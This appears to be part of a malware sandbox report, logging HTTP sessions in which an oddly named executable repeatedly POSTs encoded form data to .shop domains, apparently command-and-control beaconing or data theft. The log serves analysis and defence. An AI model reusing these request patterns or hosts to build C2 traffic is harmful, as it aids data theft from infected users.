                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrbAJGBPqSekiNFNlLHlkWggZwRIBoCZeboYSGLKT88GqdIjBLj%2FtoG0oehOD2Hr%2BwCtriyKTCpNk2kTYGYqwJl4YFKnBBfY6aAe2pugIwxlTEwg7WsA7rLiYXnQl1nJ2rpoRfTjj9w%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb557eba0426a-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 190


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.1250007104.21.90.137805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:50.058731079 CET813OUTPOST /ez1t/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.ana-silverco.shop
                                                                            Origin: http://www.ana-silverco.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.ana-silverco.shop/ez1t/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 5a 7a 68 38 67 57 78 2f 4b 34 71 4e 2f 70 39 4c 39 42 36 48 43 37 53 35 67 4b 74 56 35 6b 56 58 66 32 38 4c 2f 71 47 4f 55 37 50 41 48 53 32 39 47 4d 78 36 58 79 67 64 43 4b 4e 4d 35 61 30 34 35 4f 46 7a 50 76 36 4f 47 69 78 6a 62 66 66 51 59 53 41 70 7a 48 6a 67 4e 51 59 34 57 70 4e 4c 52 74 55 5a 64 2f 6a 2b 41 59 70 30 54 73 39 69 36 6b 44 52 69 4c 6f 64 4d 71 66 5a 36 4c 35 70 56 36 4a 2f 43 70 5a 45 34 54 63 53 6c 79 51 39 32 78 47 73 53 4f 4c 6a 6d 66 65 76 39 46 44 53 44 5a 37 59 61 47 4c 68 79 41 73 51 74 36 4d 4a 74 77 66 48 78 39 47 51 6b 43 32 47 46 64 31 34 62 35 55 37 64 6b 55 68 4c 78 59 3d
                                                                            Data Ascii: BHptZ6F=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kVXf28L/qGOU7PAHS29GMx6XygdCKNM5a045OFzPv6OGixjbffQYSApzHjgNQY4WpNLRtUZd/j+AYp0Ts9i6kDRiLodMqfZ6L5pV6J/CpZE4TcSlyQ92xGsSOLjmfev9FDSDZ7YaGLhyAsQt6MJtwfHx9GQkC2GFd14b5U7dkUhLxY=
                                                                            Dec 6, 2024 17:38:51.231123924 CET910INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:51 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncRbJFQ0QFw%2BWH%2BDc0YIPq1OEGnzWQe%2BG%2BfsfdF57MPZpn6DMs81OjFhSkXissxUlPxwmIZIq%2FHuwb%2BQ9vyeVe4PTmssyDbl49YxPRY9Z2wb0PTfNw4uMpv6BA%2FBGVsr%2BBalXs7PsfY%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb5689e41f78f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 190


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.1250016104.21.90.137805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:52.727773905 CET1826OUTPOST /ez1t/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.ana-silverco.shop
                                                                            Origin: http://www.ana-silverco.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.ana-silverco.shop/ez1t/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 5a 7a 68 38 67 57 78 2f 4b 34 71 4e 2f 70 39 4c 39 42 36 48 43 37 53 35 67 4b 74 56 35 6b 64 58 66 46 45 4c 2b 4c 47 4f 56 37 50 41 4a 79 32 2b 47 4d 78 6a 58 79 4a 55 43 4b 51 35 35 5a 41 34 2f 63 4e 7a 4a 65 36 4f 4d 69 78 6a 45 50 66 56 58 79 41 47 7a 42 44 73 4e 51 6f 34 57 70 4e 4c 52 76 38 5a 55 4c 33 2b 43 59 70 33 45 63 39 55 78 45 44 35 69 4c 78 71 4d 71 61 73 6d 72 5a 70 56 61 5a 2f 41 61 68 45 77 54 63 51 31 69 51 6c 32 32 50 73 53 50 69 53 6d 63 44 41 39 43 50 53 41 38 57 79 45 57 50 46 6e 6a 78 6f 68 35 41 33 68 79 48 73 79 4c 6d 48 71 78 43 30 4f 4f 35 6f 63 6f 34 30 59 33 38 33 64 68 76 69 66 52 30 67 74 2b 2b 2b 6f 6b 56 75 47 6d 50 50 57 7a 46 68 51 6b 6d 39 79 6e 6c 63 2f 4c 34 47 72 56 7a 35 6b 32 53 39 31 56 50 32 4a 4e 78 58 65 30 45 66 4f 4e 7a 4a 5a 6a 61 6d 32 6c 4a 32 34 5a 43 45 4a 78 56 52 78 65 4f 36 56 50 49 45 74 50 73 41 6b 71 75 77 4d 66 53 66 38 52 6c 74 71 2b 44 36 79 7a 55 65 51 4f 79 51 2b 61 54 39 74 4f [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kdXfFEL+LGOV7PAJy2+GMxjXyJUCKQ55ZA4/cNzJe6OMixjEPfVXyAGzBDsNQo4WpNLRv8ZUL3+CYp3Ec9UxED5iLxqMqasmrZpVaZ/AahEwTcQ1iQl22PsSPiSmcDA9CPSA8WyEWPFnjxoh5A3hyHsyLmHqxC0OO5oco40Y383dhvifR0gt+++okVuGmPPWzFhQkm9ynlc/L4GrVz5k2S91VP2JNxXe0EfONzJZjam2lJ24ZCEJxVRxeO6VPIEtPsAkquwMfSf8Rltq+D6yzUeQOyQ+aT9tO5XY6BucOqkfBJFuM12Yj4xJb8+XQITJ95I+ZuT5EwlYRGHiPVVlxPhLvhyZ/SaSGUXZHpVoTw6YJcg5SaeSAfQF8//XLldhjmisi2XOFYD1/4mmkOSq36k0NfM8JBlpR4r61fCc5cPVDt/gtjCMQbbq63eDckVN2yOH2ltvGv6fDVdwAn+JWw/+VhqLhg3ofIiOvtI2Uwp1tlJSoHrUjTTKDaoyFU/SEhBLyfs4ptJwC2ivU+2VmoAogZNipWdTkFbO4BJdd5nXSvZaF81DkCyEOkvscYHkyBoY6/oUjm5Oit30qhPMU39y+YGyDhC79fNJIVNUbyFLcUvU9e4fu1CLZT53G2YJWqRcNt92c7wYu/axdLsgX4AilPWYU8DQnV9RVzVkbYZ9QaJ5KOkiXUPWEJv6I2MH7oE5XVJf1T+5DF9Vl4Uj7TVCbetLTvgoznNe+9Zc4zJ98qlHPydyGIBybwRI7IggBYuvt55d3HIz3162zW84WQpubrfsxA4QVgDskWVO7ekMes6CkU9mvKftvaVk+depKibEy2AsgT7Xe5MdQUrc83FfA9vdXaRZlJXQ8j/cL2kUcyUlyLtDtr9fNCKJeeBVWLn5ByLBvqL4zE1ENQn6gr4vt409wh5o6k0987sXI/IOUEhKduZXlcLYLVwaNeSb2N1 [TRUNCATED]
                                                                            Dec 6, 2024 17:38:53.955550909 CET909INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:53 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klTNJjBKBRcyfJIazy2jYLVA0hRfmQr4XFeXLNL%2FP2eSQRU9lEJID8mbAMkExn3sZ71P%2FfDl3RsR1bjUcyxVKV%2FniUxWWLu5KGQBt5ae4r3V73kgWWqi1ml%2BOGhqUJNQB3oX9zj4a%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb5798d5fef9f-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=29696&min_rtt=29696&rtt_var=14848&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 190


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.1250021104.21.90.137805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:55.392103910 CET519OUTGET /ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.ana-silverco.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:38:56.544302940 CET847INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUKvpOayw%2FbaN0zwn70sunYJryCSswQyyAn3CKPqEpaf3Tjq7Iupbufkoy1HRwY8rJM60Vi4bseWikiCm6QPe1uPnUS0QDp0pR0uo%2BiZsXAgHAzolQ%2FlbCHY50gpkaRj1YnVU%2BjYoKk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb589f82842da-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.1250022108.179.253.197805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:39:02.526726007 CET805OUTPOST /qimy/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Origin: http://www.bloodbalancecaps.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 74 54 67 52 52 34 31 4b 49 4c 42 62 64 38 57 55 49 4c 4f 74 6a 4e 2b 4d 55 78 39 70 52 57 58 4e 37 4e 31 69 68 62 4b 50 34 59 6c 77 31 62 2b 35 43 44 34 79 64 49 46 62 4b 49 70 50 33 49 61 46 68 63 72 69 54 4f 4d 69 63 5a 4e 68 39 77 6d 65 36 67 65 59 4c 78 76 75 5a 42 6e 71 6b 4a 77 57 73 79 58 76 48 41 6b 44 6c 72 50 39 77 4a 62 54 36 4c 6c 31 39 4f 2f 71 70 4a 52 53 43 6d 6a 38 37 31 34 70 67 34 71 4c 64 72 6c 47 54 2f 51 35 66 7a 71 42 70 4b 51 43 70 35 41 4e 52 73 30 38 6b 47 39 33 6a 38 67 57 4b 47 55 6e 51 32 53 69 48 35 49 39 41 3d 3d
                                                                            Data Ascii: BHptZ6F=kUcxP68a51TnMtTgRR41KILBbd8WUILOtjN+MUx9pRWXN7N1ihbKP4Ylw1b+5CD4ydIFbKIpP3IaFhcriTOMicZNh9wme6geYLxvuZBnqkJwWsyXvHAkDlrP9wJbT6Ll19O/qpJRSCmj8714pg4qLdrlGT/Q5fzqBpKQCp5ANRs08kG93j8gWKGUnQ2SiH5I9A==
                                                                            Dec 6, 2024 17:39:03.765054941 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:39:03 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            Content-Length: 15183
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                            Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                            Dec 6, 2024 17:39:03.765098095 CET1236INData Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                            Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                            Dec 6, 2024 17:39:03.765111923 CET1236INData Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                            Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                            Dec 6, 2024 17:39:03.765125036 CET1236INData Raw: 9f 98 69 b2 58 66 55 fb 18 67 d8 7a 19 e9 0f b1 b9 7b 9f f1 c8 a6 d5 6b 75 5c e6 c6 5c 08 3f 2c b4 06 69 df b9 7d 8c d7 12 95 62 fa a5 ae 81 c2 56 eb 05 1f a2 d2 5a 04 38 26 68 bf 97 df 13 a3 04 8f c8 67 61 18 8e 57 76 b9 c0 b0 53 a3 66 16 2e 0d
                                                                            Data Ascii: iXfUgz{ku\\?,i}bVZ8&hgaWvSf.4strM.gUA~9Y>,8e^4! Ih5{5{7]-lKFW"\JM#f+}\i}DTI1']XR5nCoMr/3Q X]M'4UtE
                                                                            Dec 6, 2024 17:39:03.765223980 CET1236INData Raw: e9 64 71 f6 e6 4d c4 4d 2e d8 dc 27 55 11 79 cb b3 5c 69 cb a4 1d e3 6d 80 56 00 ed 13 a9 6a ae 70 d3 29 8b d0 68 75 d7 29 f0 24 b5 3e e9 a1 57 77 6f aa 69 6a 2e 32 a6 13 2e 7d e2 11 af e3 5d 3e ba 5e 89 53 49 e3 13 ea 75 1e 63 04 2c bc 4b b4 2a
                                                                            Data Ascii: dqMM.'Uy\imVjp)hu)$>Wwoij.2.}]>^SIuc,K*dT*gQez\fz+J1Egwl\MNkvPVhEzO&v~<bWO&{0N,BX}Qg2td>~2s\Ln@h=!
                                                                            Dec 6, 2024 17:39:03.765295982 CET1236INData Raw: f9 5b c1 34 f8 a4 37 3e 96 35 a4 03 9f 0c bb 83 a3 49 03 3a f4 c9 a0 3b 7c 22 a9 ef 92 fa 47 93 fa ae 5d ff 89 76 bd 0b 7a 8d bc 2f ba d7 47 d3 ae 31 d1 27 d7 dd de c5 5e 5a a8 84 42 9d 03 c1 c2 3b 9f 7c e6 95 9f fa 9c 70 ce 70 2b a2 e0 26 a5 89
                                                                            Data Ascii: [47>5I:;|"G]vz/G1'^ZB;|pp+&fsLgAp\RnQS34/"vY7SQqP't*@i&jXv%ap'E*~Da0:~'"j#v 1lzvReKF=80cL;|tV3c1W~
                                                                            Dec 6, 2024 17:39:03.765342951 CET1236INData Raw: c4 ec 41 67 70 85 99 87 52 ae 30 65 d4 f1 2e 8e a4 f4 30 a5 57 73 9f b2 48 cd 28 95 cc 16 9a 09 9f 5c e4 f7 e5 f7 1a bf 3a 09 58 d3 6b 93 e5 7f a7 ff 88 e3 b2 3a 02 c8 11 be 8f 35 e5 63 e4 d5 54 0f 0f 55 e3 af ce 37 9d eb 6a 0f 76 56 85 15 5c 42
                                                                            Data Ascii: AgpR0e.0WsH(\:Xk:5cTU7jvV\B[N+hnX?z:qGPPssV>Z)K0v.DDP@}&x^fydL'\BnBwosEnV!)6#iVeOUi-<efE|yE@$OY[$OCnI
                                                                            Dec 6, 2024 17:39:03.765357018 CET1000INData Raw: 6e 93 63 45 c4 15 89 79 52 73 07 59 00 d1 81 bb 84 09 01 7a 7e e0 96 67 2c 81 03 77 96 05 e2 d0 dd 94 47 b0 cd a6 b5 78 8e 0f 62 3c d3 98 65 5c cc eb 2a b6 ae 51 2a 15 cd 97 15 86 7f 04 9f 78 9d 2b 0d d9 f8 a1 93 32 83 6c 70 3d 55 8b 27 19 94 b9
                                                                            Data Ascii: ncEyRsYz~g,wGxb<e\*Q*x+2lp=U'-gILeMJ' RnD2#gh<g_57!:k_%KU@f29u{0~YORBOD+;9bS%-:{UqByUIbH.B_*i53DU1S
                                                                            Dec 6, 2024 17:39:03.765451908 CET1236INData Raw: 3a 3d ae 8e f5 b8 7e 9d 1e d7 c7 7a f4 bc d7 69 d2 f3 8e 76 e9 bd 52 97 de d1 2e fd 57 ea d2 af e9 62 32 26 04 8d 15 de 1b fe 11 16 eb 53 1d e8 fa 92 56 75 35 78 19 44 bc c8 5e 00 58 15 d6 20 0a a6 13 78 01 60 59 57 83 77 ff 62 c4 fb c3 98 9f 00
                                                                            Data Ascii: :=~zivR.Wb2&SVu5xD^X x`YWwbz5PJY|u>Z]3tL^sXayt{F{44;Xj0*G6x1v.7JJYVP<a+''TeZDm- T,T
                                                                            Dec 6, 2024 17:39:03.765642881 CET1236INData Raw: 76 d2 f8 67 74 d5 9f 35 18 43 2e 3a 97 9d 5e 55 b3 61 e9 68 01 b5 aa 08 53 ca b1 a8 41 dc 1e cd a4 71 e1 dd 5f 78 2b 56 6e c6 25 62 b7 c8 85 62 91 e9 c6 81 8e 93 ee 7e 7d 27 97 49 63 a7 43 85 5a 89 c0 33 96 40 d7 a5 ac da 0c fa f7 83 fe d3 6d 62
                                                                            Data Ascii: vgt5C.:^UahSAq_x+Vn%bb~}'IcCZ3@mb6u8Ln}e<c2Bgb-~Lss)!3Mng `hmmXXrZ|4v-w>harTftUA2>4noLyn&QIn"gi
                                                                            Dec 6, 2024 17:39:03.885915995 CET1236INData Raw: ef 35 98 1c 0d c9 a7 68 1a 0b 99 59 11 81 88 6a 9e a4 76 03 89 75 3c 29 e9 39 66 a9 d2 fc a3 a3 23 0e 4f 51 01 3c 39 c6 06 b8 5e fc da fb 72 20 c2 34 67 18 09 40 4c 1a 0d 82 e3 91 88 59 46 b1 94 23 21 cd 42 8b 83 4d 1a ae 4d 77 03 d3 58 67 95 bc
                                                                            Data Ascii: 5hYjvu<)9f#OQ<9^r 4g@LYF#!BMMwXg|PSC~v#uXY=vC_4|eAa?:'E-*Z2E^FP|_kGvf[B+ydf.CJA''Vv\#|W*_E`TLF\


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.2.1250023108.179.253.197805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:39:05.198966026 CET825OUTPOST /qimy/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Origin: http://www.bloodbalancecaps.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 4e 6a 67 4b 79 67 31 4d 6f 4c 43 48 4e 38 57 4e 59 4c 4b 74 6a 42 2b 4d 57 63 6c 6f 6a 79 58 4d 66 64 31 6a 67 62 4b 63 49 59 6c 6c 46 62 6e 6b 53 43 36 79 64 45 37 62 50 49 70 50 33 63 61 46 67 73 72 2b 77 6e 2b 6a 4d 5a 50 74 64 78 41 42 71 67 65 59 4c 78 76 75 5a 46 4a 71 67 6c 77 57 63 43 58 39 57 41 6e 64 56 72 4d 36 77 4a 62 58 36 4c 70 31 39 4f 4e 71 6f 56 72 53 48 69 6a 38 35 39 34 70 78 34 31 41 64 72 6a 4a 7a 2b 45 30 38 76 75 41 34 4c 46 5a 4c 6f 6b 46 77 63 6e 30 43 4c 6e 6f 52 30 32 44 4a 53 5a 71 48 50 69 76 45 45 42 6d 4b 37 36 71 67 44 7a 6c 63 64 71 63 79 30 74 6d 47 50 39 6a 65 38 3d
                                                                            Data Ascii: BHptZ6F=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWclojyXMfd1jgbKcIYllFbnkSC6ydE7bPIpP3caFgsr+wn+jMZPtdxABqgeYLxvuZFJqglwWcCX9WAndVrM6wJbX6Lp19ONqoVrSHij8594px41AdrjJz+E08vuA4LFZLokFwcn0CLnoR02DJSZqHPivEEBmK76qgDzlcdqcy0tmGP9je8=
                                                                            Dec 6, 2024 17:39:06.469746113 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:39:06 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            Content-Length: 15183
                                                                            Content-Type: text/html; charset=UTF-8
